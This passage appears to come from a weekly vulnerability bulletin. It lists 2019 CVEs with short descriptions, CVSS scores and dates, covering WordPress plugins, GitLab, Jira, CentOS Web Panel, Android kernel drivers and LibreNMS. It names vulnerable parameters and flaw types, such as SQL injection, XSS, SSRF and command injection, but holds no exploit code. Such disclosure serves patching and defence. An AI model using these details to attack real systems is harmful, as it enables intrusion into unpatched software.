MISCtripplite -- pdumh15at_firmware Tripp Lite PDUMH15AT 12.04.0053 devices allow unauthenticated POST requests to the /Forms/ directory, as demonstrated by changing the manager or admin password, or shutting off power to an outlet. NOTE: the vendor's position is that a newer firmware version, fixing this vulnerability, had already been released before this vulnerability report about 12.04.0053. 2019-09-12 8.5 CVE-2019-16261
MISCwondercms -- wondercms Directory traversal vulnerability in WonderCMS 2.6.0 and earlier allows remote attackers to delete arbitrary files via unspecified vectors. 2019-09-12 7.5 CVE-2019-5956
MISCwp-kama -- kama_click_counter The kama-clic-counter plugin 3.4.9 for WordPress has SQL injection via the admin.php order parameter. 2019-09-13 9.3 CVE-2017-18614
MISC
MISCyouphptube -- youphptube In YouPHPTube 7.4, the file install/checkConfiguration.php has no access control, which leads to everyone being able to edit the configuration file, and insert malicious PHP code. 2019-09-08 7.5 CVE-2019-16124
MISC
MISC
MISCMedium Vulnerabilities
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info 10web -- photo_gallery Cross site scripting (XSS) in the photo-gallery (10Web Photo Gallery) plugin before 1.5.35 for WordPress exists via admin/models/Galleries.php. 2019-09-08 4.3 CVE-2019-16117
MISC
MISC
MISC
MISC10web -- photo_gallery Cross site scripting (XSS) in the photo-gallery (10Web Photo Gallery) plugin before 1.5.35 for WordPress exists via admin/controllers/Options.php. 2019-09-08 4.3 CVE-2019-16118
MISC
MISC
MISC
MISC
MISCadobe -- application_manager Adobe application manager installer version 10.0 have an Insecure Library Loading (DLL hijacking) vulnerability. Successful exploitation could lead to Arbitrary Code Execution in the context of the current user. 2019-09-12 6.8 CVE-2019-8076
CONFIRMafterlogic -- aurora Afterlogic Aurora through 8.3.9-build-a3 has XSS that can be leveraged for session hijacking by retrieving the session cookie from the administrator login. 2019-09-12 4.3 CVE-2019-16238
MISCairbrake -- airbrake_ruby The Airbrake Ruby notifier 4.2.3 for Airbrake mishandles the blacklist_keys configuration option and consequently may disclose passwords to unauthorized actors. This is fixed in 4.2.4 (also, 4.2.2 and earlier are unaffected). 2019-09-06 5.0 CVE-2019-16060
MISCalfresco -- alfresco An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.). 2019-09-06 5.8 CVE-2019-14223
MISCapache -- ofbiz The "Blog", "Forum", "Contact Us" screens of the template "ecommerce" application bundled in Apache OFBiz are weak to Stored XSS attacks. Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16.11: 1858438, 1858543, 1860595 and 1860616 2019-09-11 4.3 CVE-2019-10073
MLISTapache -- solr Solr versions 1.3.0 to 1.4.1, 3.1.0 to 3.6.2 and 4.0.0 to 4.10.4 are vulnerable to an XML resource consumption attack (a.k.a. Lol Bomb) via it?s update handler.?By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that will expand when the server parses the XML causing OOMs. 2019-09-10 5.0 CVE-2019-12401
MLIST
MLISTapache -- traffic_control Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password. 2019-09-09 6.8 CVE-2019-12405
MLISTarubanetworks -- arubaos Some web components in the ArubaOS software are vulnerable to HTTP Response splitting (CRLF injection) and Reflected XSS. An attacker would be able to accomplish this by sending certain URL parameters that would trigger this vulnerability. 2019-09-13 4.3 CVE-2019-5314
CONFIRMatlassian -- jira The /rest/api/1.0/render resource in Jira before version 8.4.0 allows remote anonymous attackers to determine if an attachment with a specific name exists and if an issue key is valid via a missing permissions check. 2019-09-11 5.0 CVE-2019-14995
N/Aatlassian -- jira The FilterPickerPopup.jspa resource in Jira before version 7.13.7, and from version 8.0.0 before version 8.3.3 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. 2019-09-11 4.3 CVE-2019-14996
N/Aatlassian -- jira The AccessLogFilter class in Jira before version 8.4.0 allows remote anonymous attackers to learn details about other users, including their username, via an information expose through caching vulnerability when Jira is configured with a reverse Proxy and or a load balancer with caching or a CDN. 2019-09-11 4.3 CVE-2019-14997
N/Aatlassian -- jira The Webwork action Cross-Site Request Forgery (CSRF) protection implementation in Jira before version 8.4.0 allows remote attackers to bypass its protection via "cookie tossing" a CSRF cookie from a subdomain of a Jira instance. 2019-09-11 4.3 CVE-2019-14998
N/Aatlassian -- jira The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. 2019-09-11 5.0 CVE-2019-8449
N/Aatlassian -- jira The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. 2019-09-11 6.4 CVE-2019-8451
N/Abludit -- bludit Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname. 2019-09-08 6.5 CVE-2019-16113
MISCbosch -- access An unauthenticated attacker can achieve unauthorized access to sensitive data by exploiting Windows SMB protocol on a client installation. With Bosch Access Professional Edition (APE) 3.8, client installations need to be authorized by the APE administrator. 2019-09-12 4.0 CVE-2019-11899
CONFIRMbower -- bower Bower before 1.8.8 has a path traversal vulnerability permitting file write in arbitrary locations via install command, which allows attackers to write arbitrary files when a malicious package is extracted. 2019-09-13 5.0 CVE-2019-5484
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to remove a target user from phpMyAdmin via an attacker account. 2019-09-10 5.5 CVE-2019-14721
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete an e-mail forwarding destination from a victim's account via an attacker account. 2019-09-10 4.0 CVE-2019-14722
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete a victim's e-mail account via an attacker account. 2019-09-10 4.0 CVE-2019-14723
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to edit an e-mail forwarding destination of a victim's account via an attacker account. 2019-09-11 5.0 CVE-2019-14724
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to change the e-mail usage value of a victim account via an attacker account. 2019-09-11 4.0 CVE-2019-14725
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to access and delete DNS records of a victim's account via an attacker account. 2019-09-10 6.5 CVE-2019-14726
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to change the e-mail password of a victim account via an attacker account. 2019-09-10 4.0 CVE-2019-14727
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to add an e-mail forwarding destination to a victim's account via an attacker account. 2019-09-10 4.0 CVE-2019-14728
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete a sub-domain from a victim's account via an attacker account. 2019-09-10 5.5 CVE-2019-14729
MISC
MISC
MISCcentos-webpanel -- centos_web_panel In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete a domain from a victim's account via an attacker account. 2019-09-10 4.0 CVE-2019-14730
MISC
MISC
MISCchangehealthcare -- cardiology_firmware A vulnerability was found in McKesson Cardiology product 13.x and 14.x. Insecure file permissions in the default installation may allow an attacker with local system access to execute unauthorized arbitrary code. 2019-09-06 4.6 CVE-2018-18630
MISC
MISCcopy-me_project -- copy-me The copy-me plugin 1.0.0 for WordPress has CSRF for copying non-public posts to a public location. 2019-09-13 4.3 CVE-2016-10938
MISC
MISC
MISCcouchbase -- couchbase_server An issue was discovered in Couchbase Server 5.1.2 and 5.5.0. The http server on port 8092 lacks an X-XSS protection header. 2019-09-10 4.3 CVE-2019-11464
MISCcouchbase -- couchbase_server An issue was discovered in Couchbase Server 5.5.x through 5.5.3 and 6.0.0. The Memcached "connections" stat block command emits a non-redacted username. The system information submitted to Couchbase as part of a bug report included the usernames for all users currently logged into the system even if the log was redacted for privacy. This has been fixed (in 5.5.4 and 6.0.1) so that usernames are tagged properly in the logs and are hashed out when the logs are redacted. 2019-09-10 5.0 CVE-2019-11465
MISCcouchbase -- couchbase_server An issue was discovered in Couchbase Server 5.5.0 and 6.0.0. The Eventing debug endpoint mishandles authentication and audit. 2019-09-10 5.0 CVE-2019-11466
MISCcouchbase -- couchbase_server An issue was discovered in Couchbase Server 5.0.0. Editing bucket settings resets credentials, and leads to authorization without credentials. 2019-09-10 6.4 CVE-2019-11496
MISCcouchbase -- couchbase_server An issue was discovered in Couchbase Server 5.0.0. When creating a new remote cluster reference in Couchbase for XDCR, an invalid certificate is accepted. (The correct behavior is to validate the certificate against the remote cluster.) 2019-09-10 5.0 CVE-2019-11497
MISCcybozu -- garoon Cybozu Garoon 4.0.0 to 4.10.2 allows an attacker with administrative rights to cause a denial of service condition via unspecified vectors. 2019-09-12 4.0 CVE-2019-5976
MISC
MISCcybozu -- garoon Mail header injection vulnerability in Cybozu Garoon 4.0.0 to 4.10.2 may allow a remote authenticated attackers to alter mail header via the application 'E-Mail'. 2019-09-12 4.0 CVE-2019-5977
MISC
MISCcybozu -- garoon Open redirect vulnerability in Cybozu Garoon 4.0.0 to 4.10.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the application 'Scheduler'. 2019-09-12 5.8 CVE-2019-5978
MISC
MISCcybozu -- garoon SQL injection vulnerability in the Cybozu Garoon 4.0.0 to 4.10.3 allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors. 2019-09-12 6.5 CVE-2019-5991
MISC
MISCdell -- rsa_identity_governance_and_lifecycle The RSA Identity Governance and Lifecycle software and RSA Via Lifecycle and Governance products prior to 7.1.0 P08 contain a code injection vulnerability. A remote authenticated malicious user could potentially exploit this vulnerability to run custom Groovy scripts to gain limited access to view or modify information on the Workflow system. 2019-09-11 5.5 CVE-2019-3759
CONFIRMdell -- rsa_identity_governance_and_lifecycle The RSA Identity Governance and Lifecycle software and RSA Via Lifecycle and Governance products prior to 7.1.0 P08 contain a SQL Injection vulnerability in Workflow Architect. A remote authenticated malicious user could potentially exploit this vulnerability to execute SQL commands on the back-end database to gain unauthorized access to the data by supplying specially crafted input data to the affected application. 2019-09-11 6.5 CVE-2019-3760
CONFIRMdeltaww -- dcisoft Delta DCISoft 1.21 has a User Mode Write AV starting at CommLib!CCommLib::SetSerializeData+0x000000000000001b. 2019-09-11 4.6 CVE-2019-16247
MISCdeltaww -- tpeditor Delta Electronics TPEditor, Versions 1.94 and prior. Multiple heap-based buffer overflow vulnerabilities may be exploited by processing specially crafted project files, which may allow an attacker to remotely execute arbitrary code. 2019-09-11 6.8 CVE-2019-13536
MISCdeltaww -- tpeditor Delta Electronics TPEditor, Versions 1.94 and prior. Multiple stack-based buffer overflow vulnerabilities may be exploited by processing specially crafted project files, which may allow an attacker to remotely execute arbitrary code. 2019-09-11 6.8 CVE-2019-13540
MISCdeltaww -- tpeditor Delta Electronics TPEditor, Versions 1.94 and prior. Multiple out-of-bounds write vulnerabilities may be exploited by processing specially crafted project files, which may allow remote code execution. 2019-09-11 6.8 CVE-2019-13544
MISCdesignmodo -- qards The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php. 2019-09-10 4.3 CVE-2017-18598
MISCdigium -- asterisk res_pjsip_t38 in Sangoma Asterisk 13.21-cert4, 15.7.3, and 16.5.0 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. 2019-09-09 4.0 CVE-2019-15297
CONFIRM
MISCdigium -- asterisk main/translate.c in Sangoma Asterisk 13.28.0 and 16.5.0 allows a remote attacker to send a specific RTP packet during a call and cause a crash in a specific scenario. 2019-09-09 5.0 CVE-2019-15639
CONFIRM
MISCeasy!appointments_project -- easy!appointments Easy!Appointments 1.3.2 plugin for WordPress allows Sensitive Information Disclosure (Username and Password Hash). 2019-09-11 5.0 CVE-2019-14936
MISCeclipse -- omr Prior to 0.1, AIX builds of Eclipse OMR contain unused RPATHs which may facilitate code injection and privilege elevation by local users. 2019-09-12 4.6 CVE-2019-11773
CONFIRMeclipse -- paho_java_client In the Eclipse Paho Java client library version 1.2.0, when connecting to an MQTT server using TLS and setting a host name verifier, the result of that verification is not checked. This could allow one MQTT server to impersonate another and provide the client library with incorrect information. 2019-09-11 5.0 CVE-2019-11777
CONFIRMelementor -- elementor The elementor plugin before 1.8.0 for WordPress has incorrect access control for internal functions. 2019-09-10 6.5 CVE-2017-18596
MISC
MISCgetgrav -- grav_cms Grav through 1.6.15 allows (Stored) Cross-Site Scripting due to JavaScript execution in SVG images. 2019-09-08 4.3 CVE-2019-16126
MISCgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 8.x, 9.x, 10.x, and 11.x before 11.8.9, 11.9.x before 11.9.10, and 11.10.x before 11.10.2. It allows Information Disclosure. Non-member users who subscribe to notifications of an internal project with issue and repository restrictions will receive emails about restricted events. 2019-09-09 4.0 CVE-2019-11544
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community Edition 11.9.x before 11.9.10 and 11.10.x before 11.10.2. It allows Information Disclosure. When an issue is moved to a private project, the private project namespace is leaked to unauthorized users with access to the original issue. 2019-09-09 4.0 CVE-2019-11545
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.8.9, 11.9.x before 11.9.10, and 11.10.x before 11.10.2. It has Improper Encoding or Escaping of Output. The branch name on new merge request notification emails isn't escaped, which could potentially lead to XSS issues. 2019-09-09 4.3 CVE-2019-11547
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 9.x, 10.x, and 11.x before 11.8.9, 11.9.x before 11.9.10, and 11.10.x before 11.10.2. Gitaly has allows an information disclosure issue where HTTP/GIT credentials are included in logs on connection errors. 2019-09-09 4.0 CVE-2019-11549
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 11.8.x before 11.8.10, 11.9.x before 11.9.11, and 11.10.x before 11.10.3. It allows Information Disclosure. A small number of GitLab API endpoints would disclose project information when using a read_user scoped token. 2019-09-09 5.0 CVE-2019-11605
CONFIRMgitlab -- gitlab An authentication issue was discovered in GitLab that allowed a bypass of email verification. This was addressed in GitLab 12.1.2 and 12.0.4. 2019-09-09 6.5 CVE-2019-5473
CONFIRM
MISCgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Information Disclosure (issue 1 of 6). An authorization issue allows the contributed project information of a private profile to be viewed. 2019-09-09 5.0 CVE-2019-6782
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. GitLab Pages contains a directory traversal vulnerability that could lead to remote command execution. 2019-09-09 6.5 CVE-2019-6783
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows XSS (issue 1 of 2). Markdown fields contain a lack of input validation and output encoding when processing KaTeX that results in a persistent XSS. 2019-09-09 4.3 CVE-2019-6784
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Denial of Service. Inputting an overly long string into a Markdown field could cause a denial of service. 2019-09-09 4.0 CVE-2019-6785
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Incorrect Access Control (issue 1 of 3). The contents of an LFS object can be accessed by an unauthorized user, if the file size and OID are known. 2019-09-09 4.0 CVE-2019-6786
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Information Disclosure (issue 3 of 6). For installations using GitHub or Bitbucket OAuth integrations, it is possible to use a covert redirect to obtain the user OAuth token for those services. 2019-09-09 5.0 CVE-2019-6788
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Information Disclosure (issue 4 of 6). In some cases, users without project permissions will receive emails after a project move. For private projects, this will disclose the new project namespace to an unauthorized user. 2019-09-09 4.0 CVE-2019-6789
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Incorrect Access Control (issue 3 of 3). When a project with visibility more permissive than the target group is imported, it will retain its prior visibility. 2019-09-09 4.0 CVE-2019-6791
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Path Disclosure. When an error is encountered on project import, the error message will display instance internal information. 2019-09-09 5.0 CVE-2019-6792
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue. 2019-09-09 6.8 CVE-2019-6793
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Information Disclosure (issue 5 of 6). A project guest user can view the last commit status of the default branch. 2019-09-09 4.0 CVE-2019-6794
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Insufficient Visual Distinction of Homoglyphs Presented to a User. IDN homographs and RTLO characters are rendered to unicode, which could be used for social engineering. 2019-09-09 5.8 CVE-2019-6795
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 8.x, 9.x, 10.x, and 11.x before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Incorrect Access Control. Users are able to comment on locked project issues. 2019-09-09 4.0 CVE-2019-6995
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Enterprise Edition 10.x (starting in 10.6) and 11.x before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Incorrect Access Control. The merge request approvers section has an access control issue that permits project maintainers to view membership of private groups. 2019-09-09 4.0 CVE-2019-6996
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 10.x (starting in 10.7) and 11.x before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Incorrect Access Control. System notes contain an access control issue that permits a guest user to view merge request titles. 2019-09-09 4.0 CVE-2019-6997
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 8.x (starting in 8.9), 9.x, 10.x, and 11.x before 11.5.9, 11.6.x before 11.6.7, and 11.7.x before 11.7.2. It has Incorrect Access Control. Guest users are able to add reaction emojis on comments to which they have no visibility. 2019-09-09 4.3 CVE-2019-7176
CONFIRM
CONFIRMglyphandcog -- xpdfreader Xpdf 3.04 has a SIGSEGV in XRef::fetch in XRef.cc after many recursive calls to Catalog::countPageTree in Catalog.cc. 2019-09-06 4.3 CVE-2019-16088
MISCglyphandcog -- xpdfreader In Xpdf 4.01.01, a stack-based buffer under-read could be triggered in IdentityFunction::transform in Function.cc, used by GfxAxialShading::getColor. It can, for example, be triggered by sending a crafted PDF document to the pdftoppm tool. It allows an attacker to use a crafted PDF file to cause Denial of Service or possibly unspecified other impact. 2019-09-08 6.8 CVE-2019-16115
MISCgnu -- cflow GNU cflow through 1.6 has a use-after-free in the reference function in parser.c. 2019-09-09 4.3 CVE-2019-16165
MISCgnu -- cflow GNU cflow through 1.6 has a heap-based buffer over-read in the nexttoken function in parser.c. 2019-09-09 4.3 CVE-2019-16166
MISCgoogle -- android In the Android kernel in the kernel MMU code there is a possible execution path leaving some kernel text and rodata pages writable. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-2182
MISCgoogle -- android In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9248
MISCgoogle -- android In the Android kernel in unifi and r8180 WiFi drivers there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9270
MISCgoogle -- android In the Android kernel in the mnh driver there is a race condition due to insufficient locking. This could lead to a use-after-free which could lead to escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.4 CVE-2019-9271
MISCgoogle -- android In the Android kernel in the synaptics_dsx_htc touchscreen driver there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9273
MISCgoogle -- android In the Android kernel in the mnh driver there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9274
MISCgoogle -- android In the Android kernel in the synaptics_dsx_htc touchscreen driver there is a possible out of bounds write due to a use after free. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9276
MISCgoogle -- android In the Android kernel in Bluetooth there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9426
MISCgoogle -- android In the Android kernel in the bootloader there is a possible secure boot bypass. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. 2019-09-06 4.6 CVE-2019-9436
MISCgoogle -- android In the Android kernel in the mnh driver there is a possible out of bounds write due to improper input validation. This could lead to escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9441
MISCgoogle -- android In the Android kernel in the mnh driver there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System privileges required. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9442
MISCgoogle -- android In the Android kernel in the vl53L0 driver there is a possible out of bounds write due to a permissions bypass. This could lead to local escalation of privilege due to a set_fs() call without restoring the previous limit with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9443
MISCgoogle -- android In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to improper input validation. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9446
MISCgoogle -- android In the Android kernel in the FingerTipS touchscreen driver there is a possible use-after-free due to improper locking. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9447
MISCgoogle -- android In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9448
MISCgoogle -- android In the Android kernel in the FingerTipS touchscreen driver there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.4 CVE-2019-9450
MISCgoogle -- android In the Android kernel in the touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9451
MISCgoogle -- android In the Android kernel in i2c driver there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9454
MISCgoogle -- android In the Android kernel in Pixel C USB monitor driver there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9456
MISCgoogle -- android In the Android kernel in ELF file loading there is possible memory corruption due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.6 CVE-2019-9457
MISCgoogle -- android In the Android kernel in the video driver there is a use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 4.4 CVE-2019-9458
MISCheadwaythemes -- headway The Headway theme before 3.8.9 for WordPress has XSS via the license key field. 2019-09-13 4.3 CVE-2016-10953
MISChgw168cc -- yii-cms YII2-CMS v1.0 has XSS in protected\core\modules\home\models\Contact.php via a name field to /contact.html. 2019-09-08 4.3 CVE-2019-16130
MISC
MISChumanica -- humatrix The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681 allows an unauthenticated attacker to change the password of any user via the recruitment_online/personalData/act_acounttab.cfm txtNewUserName and hdNP fields. 2019-09-10 5.0 CVE-2019-16106
MISC
MISCibps_online_exam_project -- ibps_online_exam The examapp plugin 1.0 for WordPress has SQL injection via the wp-admin/admin.php?page=examapp_UserResult id parameter. 2019-09-10 6.5 CVE-2017-18602
EXPLOIT-DBif.svnadmin_project -- if.svnadmin iF.SVNAdmin through 1.6.2 allows svnadmin/usercreate.php CSRF to create a user. 2019-09-06 4.3 CVE-2019-15128
MISCimapfilter_project -- imapfilter IMAPFilter through 2.6.12 does not validate the hostname in an SSL certificate. 2019-09-08 5.0 CVE-2016-10937
MISC
MISCjtrt_responsive_tables_project -- jtrt_responsive_tables The jtrt-responsive-tables plugin before 4.1.2 for WordPress has SQL Injection via the admin/class-jtrt-responsive-tables-admin.php tableId parameter. 2019-09-10 6.5 CVE-2017-18597
MISC
MISC
MISCk-takata -- onigmo Onigmo through 6.2.0 has a NULL pointer dereference in onig_error_code_to_str because of fetch_token in regparse.c. 2019-09-09 5.0 CVE-2019-16161
MISC
MISCk-takata -- onigmo Onigmo through 6.2.0 has an out-of-bounds read in parse_char_class because of missing codepoint validation in regenc.c. 2019-09-09 5.0 CVE-2019-16162
MISCkartatopia -- piluscart In Kartatopia PilusCart 1.4.1, the parameter filename in the file catalog.php is mishandled, leading to ../ Local File Disclosure. 2019-09-08 5.0 CVE-2019-16123
MISC
MISCkilo_project -- kilo Kilo 0.0.1 has a heap-based buffer overflow because there is an integer overflow in a calculation involving the number of tabs in one row. 2019-09-08 5.0 CVE-2019-16096
MISC
MISC
MISC
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. Several of the scripts perform dynamic script inclusion via the include() function on user supplied input without sanitizing the values by calling basename() or a similar function. An attacker can leverage this to execute PHP code from the included file. Exploitation of these scripts is made difficult by additional text being appended (typically .inc.php), which means an attacker would need to be able to control both a filename and its content on the server. However, exploitation can be achieved as demonstrated by the csv.php?report=../ substring. 2019-09-09 6.8 CVE-2019-10666
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. Information disclosure can occur: an attacker can fingerprint the exact code version installed and disclose local file paths. 2019-09-09 5.0 CVE-2019-10667
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. A number of scripts import the Authentication libraries, but do not enforce an actual authentication check. Several of these scripts disclose information or expose functions that are of a sensitive nature and are not expected to be publicly accessible. 2019-09-09 6.4 CVE-2019-10668
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. There is a command injection vulnerability in html/includes/graphs/device/collectd.inc.php where user supplied parameters are filtered with the mysqli_escape_real_string function. This function is not the appropriate function to sanitize command arguments as it does not escape a number of command line syntax characters such as ` (backtick), allowing an attacker to inject commands into the variable $rrd_cmd, which gets executed via passthru(). 2019-09-09 6.5 CVE-2019-10669
MISC
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. Many of the scripts rely on the function mysqli_escape_real_string for filtering data. However, this is particularly ineffective when returning user supplied input in an HTML or a JavaScript context, resulting in unsafe data being injected into these contexts, leading to attacker controlled JavaScript executing in the browser. One example of this is the string parameter in html/pages/inventory.inc.php. 2019-09-09 4.3 CVE-2019-10670
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. It does not parameterize all user supplied input within database queries, resulting in SQL injection. An authenticated attacker can subvert these database queries to extract or manipulate data, as demonstrated by the graph.php sort parameter. 2019-09-09 6.5 CVE-2019-10671
